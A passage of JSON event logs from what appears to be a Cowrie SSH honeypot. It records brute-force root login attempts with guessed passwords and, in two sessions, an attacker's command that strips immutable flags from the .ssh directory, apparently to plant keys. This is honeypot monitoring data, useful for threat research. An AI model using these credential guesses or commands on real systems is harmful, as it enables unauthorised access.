-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:21.456062Z","src_ip":"45.159.112.103","session":"2624434042c1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:51:21.935193Z","src_ip":"45.159.112.103","session":"2624434042c1"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:22.370727Z","src_ip":"24.108.102.132","session":"26ec7f763c2e"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":43526,"dst_ip":"1.2.3.4","dst_port":22,"session":"98393f60a9fd","protocol":"ssh","message":"New connection: 24.108.102.132:43526 (1.2.3.4:22) [session: 98393f60a9fd]","sensor":"my-vps","timestamp":"2025-08-26T00:51:22.521346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:22.526701Z","src_ip":"24.108.102.132","session":"98393f60a9fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:22.694934Z","src_ip":"24.108.102.132","session":"98393f60a9fd"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.047623Z","src_ip":"45.159.112.103","session":"2624434042c1"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":39148,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba362498869a","protocol":"ssh","message":"New connection: 45.159.112.103:39148 (1.2.3.4:22) [session: ba362498869a]","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.155175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.156338Z","src_ip":"45.159.112.103","session":"ba362498869a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.264552Z","src_ip":"45.159.112.103","session":"ba362498869a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.355979Z","src_ip":"24.108.102.132","session":"98393f60a9fd"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.517770Z","src_ip":"24.108.102.132","session":"da06eae6d692"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.523184Z","src_ip":"24.108.102.132","session":"98393f60a9fd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.738719Z","src_ip":"45.159.112.103","session":"ba362498869a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.848642Z","src_ip":"45.159.112.103","session":"ba362498869a"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:23.849820Z","src_ip":"45.159.112.103","session":"4e5d9926d147"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33810,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfc2934ce848","protocol":"ssh","message":"New connection: 212.227.235.229:33810 (1.2.3.4:22) [session: bfc2934ce848]","sensor":"my-vps","timestamp":"2025-08-26T00:51:28.398007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:51:28.721601Z","src_ip":"212.227.235.229","session":"bfc2934ce848"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:51:28.722274Z","src_ip":"212.227.235.229","session":"bfc2934ce848"}
{"eventid":"cowrie.login.success","username":"root","password":"Jayant@123","message":"login attempt [root/Jayant@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:51:31.919954Z","src_ip":"212.227.235.229","session":"bfc2934ce848"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:32.797258Z","src_ip":"212.227.235.229","session":"bfc2934ce848"}
{"eventid":"cowrie.session.closed","duration":32.101990699768066,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:51:42.958608Z","src_ip":"212.227.125.160","session":"4054ecf2caf4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52892,"dst_ip":"1.2.3.4","dst_port":22,"session":"449994fceb8f","protocol":"ssh","message":"New connection: 212.227.235.229:52892 (1.2.3.4:22) [session: 449994fceb8f]","sensor":"my-vps","timestamp":"2025-08-26T00:52:00.795649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:52:00.804046Z","src_ip":"212.227.235.229","session":"449994fceb8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:52:01.039142Z","src_ip":"212.227.235.229","session":"449994fceb8f"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword1","message":"login attempt [root/P@ssword1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:52:01.979150Z","src_ip":"212.227.235.229","session":"449994fceb8f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:52:02.468032Z","src_ip":"212.227.235.229","session":"449994fceb8f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:52:02.468790Z","src_ip":"212.227.235.229","session":"449994fceb8f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:52:02.470049Z","src_ip":"212.227.235.229","session":"449994fceb8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35366,"dst_ip":"1.2.3.4","dst_port":22,"session":"28fbe0ba0795","protocol":"ssh","message":"New connection: 212.227.235.229:35366 (1.2.3.4:22) [session: 28fbe0ba0795]","sensor":"my-vps","timestamp":"2025-08-26T00:52:19.966467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-26T00:52:19.967583Z","src_ip":"212.227.235.229","session":"28fbe0ba0795"}
{"eventid":"cowrie.client.kex","hassh":"8c95e28f1643c38e5d64511b4d499e94","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 8c95e28f1643c38e5d64511b4d499e94","sensor":"my-vps","timestamp":"2025-08-26T00:52:20.244785Z","src_ip":"212.227.235.229","session":"28fbe0ba0795"}
{"eventid":"cowrie.login.success","username":"root","password":"RootRoot","message":"login attempt [root/RootRoot] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:52:21.394774Z","src_ip":"212.227.235.229","session":"28fbe0ba0795"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:52:22.025653Z","src_ip":"212.227.235.229","session":"28fbe0ba0795"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:52:22.026472Z","src_ip":"212.227.235.229","session":"28fbe0ba0795"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:52:22.027338Z","src_ip":"212.227.235.229","session":"28fbe0ba0795"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":41910,"dst_ip":"1.2.3.4","dst_port":22,"session":"8857abb4f0f9","protocol":"ssh","message":"New connection: 24.108.102.132:41910 (1.2.3.4:22) [session: 8857abb4f0f9]","sensor":"my-vps","timestamp":"2025-08-26T00:52:27.444992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:52:27.450314Z","src_ip":"24.108.102.132","session":"8857abb4f0f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:52:27.622619Z","src_ip":"24.108.102.132","session":"8857abb4f0f9"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":52344,"dst_ip":"1.2.3.4","dst_port":22,"session":"a09d2a8c6f09","protocol":"ssh","message":"New connection: 45.159.112.103:52344 (1.2.3.4:22) [session: a09d2a8c6f09]","sensor":"my-vps","timestamp":"2025-08-26T00:52:27.778325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:52:27.779120Z","src_ip":"45.159.112.103","session":"a09d2a8c6f09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:52:27.881786Z","src_ip":"45.159.112.103","session":"a09d2a8c6f09"}
{"eventid":"cowrie.login.failed","username":"uno50","password":"uno50","message":"login attempt [uno50/uno50] failed","sensor":"my-vps","timestamp":"2025-08-26T00:52:28.299180Z","src_ip":"24.108.102.132","session":"8857abb4f0f9"}
{"eventid":"cowrie.login.failed","username":"doge","password":"123","message":"login attempt [doge/123] failed","sensor":"my-vps","timestamp":"2025-08-26T00:52:28.329915Z","src_ip":"45.159.112.103","session":"a09d2a8c6f09"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:52:29.434387Z","src_ip":"45.159.112.103","session":"a09d2a8c6f09"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:52:29.472190Z","src_ip":"24.108.102.132","session":"8857abb4f0f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37400,"dst_ip":"1.2.3.4","dst_port":22,"session":"56920371ecca","protocol":"ssh","message":"New connection: 212.227.235.229:37400 (1.2.3.4:22) [session: 56920371ecca]","sensor":"my-vps","timestamp":"2025-08-26T00:52:31.593364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-26T00:52:31.594448Z","src_ip":"212.227.235.229","session":"56920371ecca"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":59714,"dst_ip":"1.2.3.4","dst_port":22,"session":"78ef851d4fb0","protocol":"ssh","message":"New connection: 27.112.78.170:59714 (1.2.3.4:22) [session: 78ef851d4fb0]","sensor":"my-vps","timestamp":"2025-08-26T00:52:31.683777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:52:31.684822Z","src_ip":"27.112.78.170","session":"78ef851d4fb0"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":48552,"dst_ip":"1.2.3.4","dst_port":22,"session":"a510947654f1","protocol":"ssh","message":"New connection: 36.89.28.139:48552 (1.2.3.4:22) [session: a510947654f1]","sensor":"my-vps","timestamp":"2025-08-26T00:52:31.792043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:52:31.793009Z","src_ip":"36.89.28.139","session":"a510947654f1"}
{"eventid":"cowrie.client.kex","hassh":"8c95e28f1643c38e5d64511b4d499e94","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 8c95e28f1643c38e5d64511b4d499e94","sensor":"my-vps","timestamp":"2025-08-26T00:52:31.872773Z","src_ip":"212.227.235.229","session":"56920371ecca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:52:31.944116Z","src_ip":"27.112.78.170","session":"78ef851d4fb0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:52:31.987706Z","src_ip":"36.89.28.139","session":"a510947654f1"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"password","message":"login attempt [teamspeak/password] failed","sensor":"my-vps","timestamp":"2025-08-26T00:52:32.828622Z","src_ip":"36.89.28.139","session":"a510947654f1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:52:33.025799Z","src_ip":"212.227.235.229","session":"56920371ecca"}
{"eventid":"cowrie.login.failed","username":"yuxiang","password":"123456","message":"login attempt [yuxiang/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T00:52:33.026760Z","src_ip":"27.112.78.170","session":"78ef851d4fb0"}
